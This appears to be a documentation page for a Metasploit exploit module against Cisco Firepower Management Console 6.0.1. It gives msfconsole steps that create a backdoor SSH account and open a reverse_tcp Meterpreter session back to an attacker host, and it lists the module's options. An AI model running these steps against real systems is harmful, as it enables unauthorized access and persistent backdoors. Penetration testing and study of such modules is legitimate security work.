This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
create a backdoor SSH account via HTTPS, and then obtain a native payload session
in SSH.

## Vulnerable Application

This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
virtual appliance here:

https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052



## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/cisco_firepower_useradd```
3. ```set password [https console password for admin]```
4. ```set rhost [IP]```
5. ```set payload linux/x86/meterpreter/reverse_tcp```
6. ```set lhost [IP]```
7. ```exploit```
8. You should get a session

## Options

### USERNAME

The username for Cisco Firepower Management console.

### PASSWORD

The password for Cisco Firepower Management console.

### NEWSSHUSER

The SSH account to create. By default, this is random.

### NEWSSHPASS

The SSH password for the new account. By default, this is also random.

### SSHPORT

In case for some reason, the SSH changed, otherwise this is 22 by default.


Collaborative Calculation and Data Science

colby

sagemath

Vulnerable Application

Verification Steps

Options

USERNAME

PASSWORD

NEWSSHUSER

NEWSSHPASS

SSHPORT

Product

Resources

Company